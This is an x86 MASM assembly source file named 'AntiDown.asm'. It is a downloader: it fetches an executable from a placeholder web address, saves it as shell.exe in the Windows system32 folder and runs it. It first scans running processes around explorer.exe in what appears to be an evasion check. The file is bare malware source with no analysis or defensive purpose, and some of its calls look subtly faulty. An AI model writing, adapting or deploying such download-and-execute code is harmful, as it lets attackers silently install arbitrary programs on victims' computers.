;AntiDown.asm
.386
.model flat,stdcall
option casemap : none
include windows.inc
include kernel32.inc
includelib kernel32.lib
include urlmon.inc
includelib urlmon.lib
include user32.inc
includelib user32.lib
DownLoad proto
CheckFatherProcessID proto
.data
SourceFile db "http://www.xxxxx.com/1.exe",0
DestFile db "C:\\windows\\system32\\shell.exe",0
szExplorer db "explorer.exe",0
hProc dword 0
.data?
dwFatherProcID DWORD ?
dwChildProcID DWORD ?
.code
;
start:
;
invoke CheckFatherProcessID
.if (!eax)
invoke ExitProcess,0
.endif
invoke DownLoad
invoke ExitProcess,0
DownLoad proc
LOCAL hInstance:DWORD
invoke URLDownloadToFile,NULL,addr SourceFile,addr DestFile,0,NULL
invoke Sleep,2000
invoke WinExec,addr DestFile,SW_SHOW
ret
DownLoad endp
CheckFatherProcessID proc
;LOCAL hProc: HANDLE
LOCAL pe: PROCESSENTRY32
mov pe.dwSize,sizeof PROCESSENTRY32
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov hProc,eax
mov eax,INVALID_HANDLE_VALUE
.if eax == hProc
xor eax,eax
;
ret
.endif
invoke Process32First,hProc,addr pe
.while (eax)
;invoke StrCmpi,addr szExplorer,addr pe.szExeFile
invoke lstrcmpi, szExplorer, pe.szExeFile
.if (eax == 0)
push pe.th32ParentProcessID
pop dwFatherProcID
push pe.th32ProcessID
pop dwChildProcID
.endif
invoke Process32Next,hProc,addr pe
.endw
invoke CloseHandle,hProc
push ebx
mov eax,dwFatherProcID
mov ebx,dwChildProcID
.if eax == ebx
xor eax,eax
pop ebx
ret
.else
mov eax,1
pop ebx
ret
.endif
ret
CheckFatherProcessID endp
end start
